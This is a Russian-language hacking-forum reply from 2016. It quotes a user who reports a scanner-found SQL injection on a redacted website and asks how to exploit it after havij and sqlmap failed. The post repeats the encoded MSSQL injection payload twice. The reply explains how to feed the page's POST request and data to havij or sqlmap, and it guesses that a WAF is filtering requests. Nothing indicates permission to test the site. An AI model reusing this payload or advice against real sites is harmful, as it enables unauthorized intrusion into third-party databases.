Показать сообщение отдельно

  #4  
Старый 18.01.2016, 18:10
BabaDook
Познавший АНТИЧАТ
Регистрация: 09.05.2015
Сообщений: 1,066
Провел на форуме:
238786

Репутация: 40


По умолчанию

Цитата:
Сообщение от sodgam  

Здравствуйте. Нашел одним известным сканером уязвимость:
http://www.------.com/-/Search.htm
атакующий скрипт:
(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHAR(6 4)%2bCHAR(50)%2bCHAR(100)%2bCHAR(105)%2bCHAR(108)% 2bCHAR(101)%2bCHAR(109)%2bCHAR(109)%2bCHAR(97))+FR OM+syscolumns)
Далее пробовал использовать havij и sqlmap, но ничего не получилось. Подскажите что нужно делать?
ну ладно , смотри

http://www.------.com/-/Search.htm

из Search.htm видно что пост запрос, для этого тебе надо в хавидж или sqlmap дать сылку УРЛ http://www.------.com/-/Search.htm У казать что это пост запрос и указать данные которые отправляются. сканер не акунетикс?

(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHAR(6 4)%2bCHAR(50)%2bCHAR(100)%2bCHAR(105)%2bCHAR(108)% 2bCHAR(101)%2bCHAR(109)%2bCHAR(109)%2bCHAR(97))+FR OM+syscolumns)

там скорее всего waf суда по данным которые закодированы чаром
 
Ответить с цитированием